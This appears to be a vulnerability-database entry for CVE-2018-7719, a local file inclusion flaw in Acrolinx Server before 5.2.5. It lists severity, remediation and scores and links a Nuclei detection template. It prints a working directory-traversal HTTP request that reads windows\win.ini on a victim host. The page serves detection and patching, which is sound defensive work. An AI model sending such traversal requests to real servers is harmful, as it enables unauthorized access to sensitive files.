🔙 목록으로 돌아가기

CVE-2018-7719: Acrolinx Server <5.2.5 - Local File Inclusion

TitleAcrolinx Server <5.2.5 - Local File Inclusion
Author0x_akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
RemediationUpgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.86831
CVE IDCVE-2018-7719
CWE IDCWE-22
Tags cve2018 cve acrolinx lfi packetstorm edb vuln

🔍 Vulnerability Description

Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.

🌐 HTTP Request

GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: www.victim.com

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7719.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7719.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A